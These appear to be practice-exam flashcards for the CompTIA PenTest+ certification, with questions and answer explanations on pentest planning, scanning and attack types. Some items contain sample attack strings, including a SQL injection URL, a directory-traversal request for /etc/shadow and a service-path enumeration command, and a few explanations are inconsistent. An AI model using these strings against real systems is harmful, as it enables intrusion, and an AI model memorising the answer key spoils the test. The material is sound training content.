CompTIA PenTest+ (PT0-001) Practice Certification Exams (Jason Dion, 6 of 6) Flashcards

1
Q

You have been contracted to conduct a penetration test against Dion Training’s learning management system (LMS). The company wants to determine how effectively their LMS can scale up during periods of high student demand without negatively affecting the student experience. Which of the following things in your engagement documentation would be the MOST important to ensuring successful load testing?

A.If a black box or white box test will be utilized

B.The time of day used for conducting the test

C.The IP addresses of the servers

D.If a certificate pinning exception will be used

A

B.The time of day used for conducting the test

Explanation: OBJ-1.3: The time of day used for conducting the test is critically important based on this engagement’s goals. This engagement seeks to determine if their LMS can quickly scale up in response to increased student demand. This is not just a bandwidth test or simple load test; they also want to determine if the customer/student experience is affected. To determine that, the engagement must occur while many real students are also online and taking the courses.

2
Q

Which of the following rules of engagement provides a clear enumeration of the tasks to be performed as part of the penetration test?

A.Timeline

B.Location of team

C.Temporal restrictions

D.Test boundaries

A

A.Timeline

Explanation: OBJ-1.1: The timeline of an engagement provides a clear enumeration of the tasks to be performed as part of the penetration test. This is documented in the rules of engagement. This timeline may also include who will perform each task. The timeline does not have to be written to detail the exact day or time of the task but should, at a minimum, provide a logical sequence or order to the engagement.

3
Q

What is a legal contract outlining the confidential material or information that will be shared by the pentester and the organization during an assessment?

A.SOW

B.MSA

C.NDA

D.Corporate policy

A

C.NDA

Explanation: OBJ-1.2: This is the definition of a non-disclosure agreement (NDA). There may be two NDAs in use: One from the organization to the pentester and another from the pentester to the organization. The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the assessment’s size and scope and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scopes for each one. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

4
Q

You are preparing for an upcoming penetration test. You want to begin your reconnaissance but need to validate the scope of the IP addresses and the times of day you can scan the network. Which of the following documents should you refer to find these details?

A.RFP

B.MSA

C.ROE

D.NDA

A

C.ROE

Explanation: OBJ-1.2: The rules of engagement (ROE) contain the timeline, location, temporal restrictions, transparency of testing, and test boundaries for the penetration test. Therefore, if you look at the temporal restrictions portion of the ROE, you will see what times of day you can perform your scans and exploits. If you reference the test boundaries section, it should contain what types of scanning and exploits are allowed to be used and which systems are and are not in the scope of the assessment.

5
Q

A military defense contracting company has hired your company to conduct a penetration test against their networks. Their company has a strong vulnerability management program in place, but they are concerned that they may still be subject to remote hackers’ intrusion. They have asked your company to create a red team with their most skilled hackers and conduct a long-term engagement over 6-12 months. The goal of this assessment is to emulate an attacking group that uses stealth while infiltrating the network, quietly maintaining persistence, and slowly exfiltrating data out of the network over time to determine if their cybersecurity analysts could detect this type of threat. Which of the following types of threat actors will your red team need to emulate?

A.Hacktivists

B.APT

C.Script kiddies

D.Insider threat

A

B.APT

Explanation: OBJ-1.3: An advanced persistent threat (APT) is a type of attacker that keeps a low profile while infiltrating a remote network. Once inside the network, they maintain their patience while gathering intelligence and slowly exfiltrating data out of the network. Many APTs work for a nation-state and focus on intelligence operations. Some APTs also perform corporate espionage to steal highly guarded trade secrets from competitors. APTs commonly use several attack vectors to ensure their success in gaining unauthorized access to information.

6
Q

You are planning an engagement with a new client. Which target type should be selected to simulate a hacktivist or script kiddie?

A.Internal

B.On-site

C.Off-site

D.Third-party hosted

A

C.Off-site

Explanation: OBJ-1.3: A hacktivist, script kiddie, or APT is usually defined as an off-site or external target type. A hacktivist is a hacker who gains unauthorized access and disrupts a computer system to achieve political or social change. A script kiddie is an inexperienced hacker with limited technical knowledge who relies on automated tools to hack. An APT is an advanced hacker who can avoid detection for a long period of time. An APT is usually a nation state-funded hacker used for intelligence gathering operations.

7
Q

What is not a step in the NIST SP 800-115 Methodology?

A.Planning

B.Discovery

C.Reporting

D.Scoping

A

D.Scoping

Explanation: OBJ-1.3: Scoping is not one of the four steps in the NIST SP 800-115 (Technical Guide to Information Security Testing and Assessment) methodology. The four steps are Planning, Discovery, Attack, and Reporting.

8
Q

Which type of agreement between companies and employees is used as a legal basis for protecting information assets?

A.MOU

B.NDA

C.ISA

D.SLA

A

B.NDA

Explanation: OBJ-1.2: A non-disclosure agreement (NDA) is the legal basis for protecting information assets. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express intent for two companies to work together. A service level agreement (SLA) is a contractual agreement setting out the detailed terms under which a service is provided. The interconnection security agreement (ISA) governs the relationship between any federal agency and a third party interconnecting their systems.

9
Q

Which of the following rules of engagement provides the days and times that the penetration test can occur?

A.Timeline

B.Location of team

C.Temporal restrictions

D.Test boundaries

A

C.Temporal restrictions

Explanation: OBJ-1.1: Temporal restrictions provide the constraints for which days and times the penetration test can be performed. For example, some rules of engagement will prevent the engagement from occurring outside of normal working hours. Conversely, others only allow the engagement to occur during working hours. This is something that should be clearly documented in the scope of work and the scoping documents.

10
Q

Which of the following is NOT one of the main criteria included in a penetration testing plan?

A.Timing

B.Scope

C.Account credentials

D.Authorization

A

C.Account credentials

Explanation: OBJ-1.1: The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization. Account credentials are usually provided during a white box test or vulnerability assessment, but they are usually not provided for a penetration test.

11
Q

What is a legal contract that outlines the guidelines for any business documents and contracts between two parties?

A.SOW

B.MSA

C.NDA

D.AUP

A

B.MSA

Explanation: OBJ-1.2: A master service agreement (MSA) is an agreement that establishes precedence and guidelines for any business documents that are executed between two parties. If a company is hiring a penetration testing firm to conduct multiple engagements, they may use a master service agreement to cover each assessment’s commonalities and scope. Then, there would be a scope of work (SOW) for each assessment completed under the MSA.

12
Q

What type of assessment seeks to validate a system’s security posture against a particular checklist?

A.Compliance-based

B.Objective-based

C.Goal-based

D.Red Team

A

A.Compliance-based

Explanation: OBJ-1.3: Compliance-based assessments seek to validate a system against a given checklist. This could validate organizational policies, be risk-based, or be used to validate PCI-DSS compliance. Objective-based penetration testing approaches an objective from all angles to ensure that information remains secure. This testing more accurately simulates the attacks launched by a malicious party. Goal-based assessments use goals defined before the assessment begins, and the penetration tester works to achieve the goals. Once a goal is achieved, the penetration testers should determine how many unique ways the goal can be achieved. A red team is a group that helps organizations to improve themselves by providing opposition to the point of view of the organization that they are helping.

13
Q

A cybersecurity analyst is working at a college that wants to increase its network’s security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?

A.Passive scanning engine located at the core of the network infrastructure

B.Combination of cloud-based and server-based scanning engines

C.Combination of server-based and agent-based scanning engines

D.Active scanning engine installed on the enterprise console

A

D.Active scanning engine installed on the enterprise console

Explanation: OBJ-2.2: Since the college wants to ensure a centrally-managed enterprise console, an active scanning engine installed on the enterprise console would best meet these requirements. The college’s cybersecurity analysts could then perform scans on any devices connected to the network using the active scanning engine at the desired intervals. Agent-based scanning would be ineffective since the college cannot force the agents’ installation onto each of the personally owned devices brought in by the students or faculty. A cloud-based or server-based engine may be useful, but it won’t address the centrally-managed requirement. Passive scanning is less intrusive but is subject to a high number of false positives.

14
Q

You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customers’ credit cards during processing. Which of the following types of threats would you classify this malware as?

A.Rootkit

B.Keylogger

C.Ransomware

D.PoS Malware

A

D.PoS Malware

Explanation: OBJ-2.5: Point-of-sale malware (POS malware) is a type of malicious software used by cybercriminals to target point of sale (POS) and payment terminals with the intent of obtaining credit card and debit card information (a card’s track 1 or track 2 data and even the CVV code) by intercepting the processing at the retail checkout point-of-sale system, a form of man-in-the-middle attack. Ransomware is a type of malware that threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send it back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.

15
Q

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over the results of their nmap scan:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Starting NMAP 7.60 at 2020-06-12 21:23:15
NMAP scan report for 192.168.1.45
Host is up (0.78s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
515/tcp open
631/tcp open ipp
9100/tcp open
MAC Address: 00:0C:29:18:6B:DB
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following operating systems is most likely used by the host?

A.Windows server

B.Linux server

C.Windows workstation

D.Networked printer

A

D.Networked printer

Explanation: OBJ-2.3: Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP by most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, and 445 are found, this is usually a good indication of a Windows file server. Ports such as FTP, telnet, SMTP, and HTTP are used by both Windows and Linux servers; therefore, they are not as helpful in indicating which operating system is in use by the host.

16
Q

Which of the following exploitation frameworks contain plugins that can trigger buffer overflows in SCADA systems, such as /exploit/windows/scada/daq_factory_bof that can trigger a stack overflow by sending excessive requests to a service port on the system?

A.Nessus

B.Androzer

C.Metasploit

D.Nikto

A

C.Metasploit

Explanation: OBJ-2.5: Metasploit is an open-source exploitation framework that uses plugins to add different exploits and functionalities. They are always in the form of a directory structure, like /exploit/windows/scada/daq_factory_bof. This represents the plugin type (exploit), the operating system involved (windows), the service/program (scada), and the specific exploit (daq_factory_bof). If you see this format in a question, the answer is most likely Metasploit related.

17
Q

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?

A.Conducting a port scan of 192.168.1.142

B.Conducting a brute force login attempt of a remote service on 192.168.1.142

C.Conduct a ping sweep of 192.168.1.142/24

D.Conducting a Denial of Service attack on 192.168.1.142

A

B.Conducting a brute force login attempt of a remote service on 192.168.1.142

Explanation: OBJ-2.4: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username, find a hidden web page, or find the key used to encrypt a message using a trial-and-error approach, hoping eventually to guess correctly. Port scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

18
Q

You are attending a cybersecurity conference and just watched a security researcher demonstrating the exploitation of a web interface on a SCADA/ICS component. This caused the device to malfunction and be destroyed. You recognize that the same component is used throughout your company’s manufacturing plants. Which of the following mitigation strategies would provide you with the most immediate protection against this emergent threat?

A.Demand that the manufacturer of the component release a patch immediately and deploy the patch as soon as possible

B.Logically or physically isolate the SCADA/ICS component from the enterprise network

C.Evaluate if the web interface must remain open for the system to function; if it is not needed, block the web interface

D.Replace the affected SCADA/ICS components with more secure models from a different manufacturer

A

C.Evaluate if the web interface must remain open for the system to function; if it is not needed, block the web interface

Explanation: OBJ-2.5: The most immediate protection against this emergent threat would be to block the web interface from being accessible over the network. Before doing this, you must evaluate whether the interface needs to remain open for the system to function properly. If it is not needed, you should block it to minimize the SCADA/ICS component’s attack surface. Ideally, your SCADA/ICS components should already be logically or physically isolated from the enterprise network. Since the question doesn’t mention the networks as an area of concern, we can assume they are already following the industry best practice of logical or physical segmentation between the SCADA/ICS network and the enterprise network. On the exam, make sure you focus on the question being asked. In this case, the question focuses on the web interface. Developing a patch can be a time-consuming process, therefore waiting for the manufacturer to provide a patch will not provide immediate protection to your components. The same is true for replacing the affected components. Even if you could get the company to authorize the funding for such a purchase, it would take time to order, ship, receive, and install the new components. Additionally, you would cause unwanted downtime in the factory during the installation of the components, making it an ineffective option when simply blocking the web interface is free, quick, and effective.

19
Q

An analyst just completed a port scan and received the following results of open ports:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
TCP: 80
TCP: 110
TCP: 443
TCP: 1433
TCP: 3306
TCP: 3389
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on these scan results, which of the following services are NOT currently operating?

A.Web

B.Database

C.SSH

D.RDP

A

C.SSH

Explanation: OBJ-2.1: Based on the port numbers shown as open in the nmap scan results, SSH is not currently operating. SSH operates over port 22. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389.

20
Q

You are analyzing the vulnerability scanning results from a recent web vulnerability scan in preparation for the exploitation phase of an upcoming assessment.

A portion of the scan results is shown below. Which exploit is the website vulnerable to based on the results?

A.Cookie manipulation

B.Local file inclusion

C.SQL Injection

D.Session hijacking

A

B.Local file inclusion

Explanation: OBJ-2.3: Based on the results, you can determine that this website is vulnerable to a file inclusion exploit. If you were able to decode the Base64 data in the vulnerability (which you are not expected to on the exam in real-time), you would see it references a local file like c:\wwwroot\image.jpg or similar. You could also use the process of elimination on this question by seeing no SQL or cookies displayed in the results.

21
Q

You have been given access to a Windows system located on an Active Directory domain as part of a white box penetration test. Which of the following commands would provide information about other systems on this network?

A.net use

B.net user

C.net group

D.net config

A

A.net use

Explanation: OBJ-2.1: The net use command will list network shares that the workstation is using. This will help to identify file servers and print servers on the network. The net group command can only be used on domain controllers. The net config command will allow servers and workstations services to be controlled once they have already been identified. The net user command would show any user accounts on the local Windows workstation you are using.

22
Q

Syed is developing a vulnerability scanner program for a large network of sensors to monitor his company’s transcontinental oil pipeline. What type of network is this?

A.SoC

B.CAN

C.BAS

D.SCADA

A

D.SCADA

Explanation: OBJ-2.5: SCADA (supervisory control and data acquisition) networks work off an ICS (industrial control system) and maintain sensors and control systems over large geographic areas. A building automation system (BAS) for offices and data centers (“smart buildings”) can include physical access control systems, but also heating, ventilation, and air conditioning (HVAC), fire control, power and lighting, and elevators and escalators. Vehicular networks are called a controller area network (CAN). A CAN uses serial communication buses to connect electronic control units and other subsystems in cars and unmanned aerial vehicles (UAV). System-on-chip (SoC) is a design where all these processors, controllers, and devices are provided on a single processor die or chip.

23
Q

A software developer has just finished writing a new application. You have been contracted to conduct a scan to determine what vulnerabilities may exist. The developer provides you with the source code and the binary for the application. Which of the following should you perform FIRST?

A.Vulnerability scan

B.Dynamic application scan

C.Static application scan

D.Compliance scan

A

C.Static application scan

Explanation: OBJ-2.2: A static application scan, or static code analysis, is the process of reviewing the source code while it is not executing. This requires the source code of the application, which in this scenario was provided. Static analysis can help you discover how the application functions and will allow you to find mistakes caused by poor programming practices, such as the failure to conduct input validation. If you have the source code and understand how to read the language used in it, you should first conduct a static code analysis. Once completed, you can move on to a dynamic application scan.

24
Q

In a CVSS metric, which of the following is NOT one of the factors that comprise the base score for a given vulnerability?

A.Access vector

B.Authentication

C.Access complexity

D.Availability

A

B.Authentication

Explanation: OBJ-2.3: In CVSS 3.1, the base metric is comprised of 8 factors: access vector (AV), access complexity (AC), privileges required (PR), user interaction (UI), scope (S), confidentiality (C), integrity (I), and availability (A).

25
Q

You have just conducted an automated vulnerability scan against a static webpage without any user input fields. You have been asked to adjudicate the scanner’s findings in the automated report. Which of the following is MOST likely to be a false positive?

A.Missing secure flag for sites cookies

B.Version disclosure of server information

C.Supports weak cipher suites

D.Unencrypted transfer of data

A

B.Version disclosure of server information

Explanation: OBJ-2.3: The disclosure of internal server information, such as its version, is a common vulnerability on both static webpages and dynamic webpages. This disclosure can occur during banner grabbing or by reviewing the source code of the webpage.

26
Q

You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization’s operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system?

A.Ask the CEO for a list of the critical systems

B.Conduct a nmap scan of the network to determine the OS of each system

C.Scope the scan based on IP subnets

D.Review the asset inventory and BCP

A

D.Review the asset inventory and BCP

Explanation: OBJ-2.1: To best understand a system’s criticality, you should review the asset inventory and the BCP. Most organizations classify each asset in its inventory based on its criticality to the organization’s operations. This helps to determine how many spare parts to have, the warranty requirements, service agreements, and other key factors to help keep these assets online and running at all times. Additionally, you can review the business continuity plan (BCP) since this will provide the organization’s plan for continuing business operations in the event of a disaster or other outage. Generally, the systems or operations listed in a BCP are the most critical ones to support business operations. While the CEO may be able to provide a list of the most critical systems in a large organization, it isn’t easy to get them to take the time to do it, even if they did know the answer. Worse, in most large organizations, the CEO isn’t going to know what systems they rely on, but instead just the business functions those systems serve, again making this a bad choice. While conducting an nmap scan may help you determine what OS is being run on each system, this information doesn’t help you determine criticality to operations. The same is true of using IP subnets since a list of subnets by itself doesn’t provide criticality or prioritization of the assets.

27
Q

Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization’s data center?

A.Schedule scans to be conducted evenly throughout the day

B.Schedule scans to run during periods of low activity

C.Schedule scans to begin at the same time everyday

D.Schedule scans to run during peak times to simulate performance under load

A

B.Schedule scans to run during periods of low activity

Explanation: OBJ-2.2: For the best results, the scans should be scheduled during periods of low activity. This will help to reduce the negative impact of scanning on business operations. The other three options all carry a higher risk of causing disruptions to the network or its business operations.

28
Q

The management at Steven’s work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network?

A.A discovery scan using a port scanner

B.Router and switch-based MAC address reporting

C.A physical survey

D.Reviewing a central administration tool like a SCCM

A

B.Router and switch-based MAC address reporting

Explanation: OBJ-2.1: The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.

29
Q

An analyst reviews the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors can access the internet. How can this type of attack be prevented from occurring in the future?

A.Implement a VLAN to separate the HVAC control system from the open wireless network

B.Install an IDS to protect the HVAC system

C.Enable NAC on the open wireless network

D.Enable WPA2 security on the open wireless network

A

A.Implement a VLAN to separate the HVAC control system from the open wireless network

Explanation: OBJ-2.5: A VLAN is useful to segment network traffic to various parts of the network and stop someone on the open wireless network from logging in to the HVAC controls. By utilizing NAC, each machine connected to the open wireless network could be checked for compliance to determine if it is a ‘known’ machine, but they would still be given access to the entire network. Also, since this is a publicly usable network, using NAC could prevent users from accessing all the network features. An IDS would be a good solution to detect the attempted logins, but it won’t prevent them. Instead, an IPS would be required to prevent logins.

30
Q

A vulnerability scanner has reported that a vulnerability exists in the system. Upon validating the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation?

A.False positive

B.False negative

C.True positive

D.True negative

A

A.False positive

Explanation: OBJ-2.3: A false positive occurs when a scanner detects a vulnerability, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a scanner detects a vulnerability, and the vulnerability exists on the scanned system. A true negative occurs when a scanner does not detect a vulnerability because the vulnerability does not exist on the scanned system. A false negative occurs when a scanner does not detect a vulnerability, but the vulnerability actually exists on the scanned system.

31
Q

You are conducting a penetration test against an organization. You have captured the legitimate authentication handshake between a client and a server. Later in the day, you retransmit that session while spoofing your MAC address to that of the client. Which of the following exploits are you using?

A.Relay attack

B.Fragmentation attack

C.Replay attack

D.Downgrade attack

A

C.Replay attack

Explanation OBJ-3.3: A replay attack repeats a legitimate transmission in a malicious context. For example, a user might send their authentication information to a client or system; the attacker who eavesdrops on this communication can use the authentication in a later transmission, essentially impersonating the victim. In wireless networking, replaying transmissions can be used to enable several different attacks. Do not confuse a replay attack with a relay attack. In a replay attack, a legitimate network packet or frame is retransmitted repeatedly. In a relay attack, an attacker inserts themselves man-in-the-middle style between two devices, intercepting and forwarding traffic between them.

32
Q

While conducting a penetration test of a web application, you enter the following URL,

http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10.

What type of exploit are you attempting?

A.Session hijacking

B.SQL Injection

C.Buffer overflow

D.XML Injection

A

B.SQL Injection

Explanation OBJ-3.4: This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscated form of the 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed by a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic.

33
Q

You are scheduled to conduct a physical penetration test against an organization. You need to access the building when many other employees are arriving at work in the morning. Which of the following methods would be the MOST effective to utilize?

A.Fence jumping

B.Badge cloning

C.Lock picking

D.Tailgating

A

D.Tailgating

Explanation OBJ-3.6: Tailgating is an attack where the attacker slips into a secure area by following an authorized employee. The employee doesn’t know that anyone is behind them. When trying to enter a building during the morning rush, it is common that other friendly employees will either hold the door open for you (piggybacking) or will open the door for themselves but not push it closed behind them as they walk through it. This would be the perfect time to tailgate into the building.

34
Q

In which type of attack does the attacker begin with a normal user account and then seek additional access rights?

A.Privilege escalation

B.Spear phishing

C.Cross-site scripting

D.Remote code execution

A

A.Privilege escalation

Explanation OBJ-3.5: Privilege escalation attacks seek to increase the access level that an attacker has to a target system. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization, or business. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Remote code execution is the ability an attacker has to access someone else’s computing device and make changes, no matter where the device is geographically located.

35
Q

You are conducting a social engineering attack against an organization as part of an engagement. You run over to a busy employee and quickly push a USB drive in their face. “Quick, quick, I am running late for my presentation. Please, print out the PDF on this drive for me!” The employee looks unwilling to help, but you continue to explain how you are running out of time and need their assistance. What type of social engineering principle is being exploited here?

A.Authority

B.Scarcity

C.Urgency

D.Trust

A

C.Urgency

Explanation:

OBJ-3.1: Urgency is focused on the element of time. An attacker encourages the victim to act quickly, which often leads to them making security mistakes. Urgency is related to scarcity, and the two are often effectively used together.

36
Q

In what type of attack does the potential intruder trick a user into providing sensitive information?

A.Social engineering

B.Bluesnarfing

C.Man-in-the-middle

D.Evil twin

A

A.Social engineering

Explanation OBJ-3.1: Social engineering is the art of convincing people to reveal confidential information to the intruder.

37
Q

What is a common technique used by malicious individuals to perform a man-in-the-middle attack on a wireless network?

A.ARP cache poisoning

B.Amplified DNS attacks

C.Session hijacking

D.Creating an evil twin

A

D.Creating an evil twin

Explanation OBJ-3.3: Evil Twin access points are the most common way to perform a man-in-the-middle attack on a wireless network. An evil twin is a copy of a legitimate access point, not necessarily giving it access to a specific network or even the internet.

38
Q

Your smartphone begins to receive unsolicited messages while you are eating lunch at the restaurant across the street from your office. What might cause this to occur?

A.Packet sniffing

B.Bluesnarfing

C.Bluejacking

D.Geotagging

A

C.Bluejacking

Explanation OBJ-3.3: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as smartphones and tablets. On the other hand, Bluesnarfing involves taking data from a smartphone or tablet over Bluetooth without permission. Bluetooth has a limited range, so the attacker is likely within 10 meters of the victimized device. Geotagging involves embedding the geolocation coordinates into a piece of data (normally a photo or video). Packet sniffing is a passive method of collecting network traffic for follow-on analysis at a later time.

39
Q

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of exploit are you attempting?

A.SQL Injection

B.Buffer overflow

C.Directory traversal

D.XML Injection

A

C.Directory traversal

Explanation OBJ-3.4: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input.

40
Q

Several users have contacted the help desk to report that they received an email from a well-known bank stating that their accounts have been compromised and they need to “click here” to reset their banking password. Some of these users are not even customers of this particular bank, though. Which of the following best describes this type of attack?

A.Phishing

B.Spear phishing

C.Whaling

D.Brute force

A

A.Phishing

Explanation: OBJ-3.1: This is an example of a phishing attack. Phishing is the fraudulent practice of sending emails and pretending to be from a reputable company to trick users into revealing personal information, such as passwords and credit card numbers. This email appears to be untargeted since it was sent to both customers and non-customers of this particular bank; it is best classified as phishing. Spear phishing requires the attack to be more targeted and less widespread.

41
Q

Jason is conducting a penetration test against an organization’s Windows network. He then enters a command into the shell and receives the following output:

-=-=-=-=-=-
C:\Users\jason\Desktop> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """
VulnerableService  Some Vulnerable Service  C:\Program Files\A Subfolder\B Subfolder\SomeExecutable.exe
-=-=-=-=-=-

Based on the output above, which of the following types of vulnerabilities does this Windows system contain?

A.Writeable service

B.Clear text credentials in LDAP

C.Unquoted service path

D.Unsecure file/folder permissions

A

C.Unquoted service path

Explanation OBJ-3.5: This Windows machine contains an unquoted service path vulnerability, as shown in the output. If a service is created with an executable path that contains spaces and is not enclosed within quotes, then an unquoted service path vulnerability exists. In Windows, if the service path is not enclosed within quotes and contains spaces, the system treats each space as a break and passes the rest of the service path as an argument. If the service involved has SYSTEM privileges, an attacker could exploit this vulnerability and gain SYSTEM level access. This command lists the service name, executable path, display name, and start mode of the automatically starting services in all directories except C:\Windows\ (since by default there is no such service that has spaces and is unquoted in this folder). As shown in the output, the service called “VulnerableService” has an unquoted service path.

42
Q

You are planning to exploit a network-based vulnerability against an organization as part of a penetration test. You attempted to connect your laptop to the network jack in their conference room. You found yourself in the highly restricted VLAN that the organization allows its visitors to connect to when conducting presentations. This VLAN only allows you to access the internet, not the internal network. You decide you need to conduct VLAN hopping. Which of the following methods would be MOST likely to succeed?

A.Spoof the MAC address of the room’s VOIP phone to your laptop

B.Poison or overflow the MAC table of the switch

C.Connect a wireless access point to the conference room’s network jack

D.Harvest the user credentials of an employee and use those to connect

A

B.Poison or overflow the MAC table of the switch

Explanation OBJ-3.2: VLAN hopping is the act of illegally moving from one VLAN to another. A VLAN (virtual LAN) is a logical grouping of switch ports extending across any number of switches on an Ethernet network. One of the most common VLAN hopping methods is to overflow the MAC table on a vulnerable switch. When this occurs, the switch defaults to operating as a hub and repeats all frames being received through all of its ports. This “fail open” method ensures the network can continue to operate, but it is a security risk that can be exploited by the penetration tester.

43
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
https://test.diontraining.com/profile.php?userid=1546
https://test.diontraining.com/profile.php?userid=5482
https://test.diontraining.com/profile.php?userid=3618
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of vulnerability does this website have?

A.Race conditions

B.Insecure direct object reference

C.Improper error handling

D.Weak or default configurations

A

B.Insecure direct object reference

Explanation OBJ-3.4: Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. An attacker could change the userid number and directly access any user’s profile page in this scenario. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer. Weak or default configurations are commonly a result of incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information. Improper handling of errors can reveal implementation details that should never be revealed, such as detailed information that can provide hackers important clues on the system’s potential flaws.

44
Q

Evaluate the following log entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this log entry, which of the following statements are true?

A.The packet was blocked inbound to the network

B.MAC filtering is enabled on the firewall

C.Packets are being blocked inbound to and outbound from the network

D.An attempted connection to the telnet service was prevented

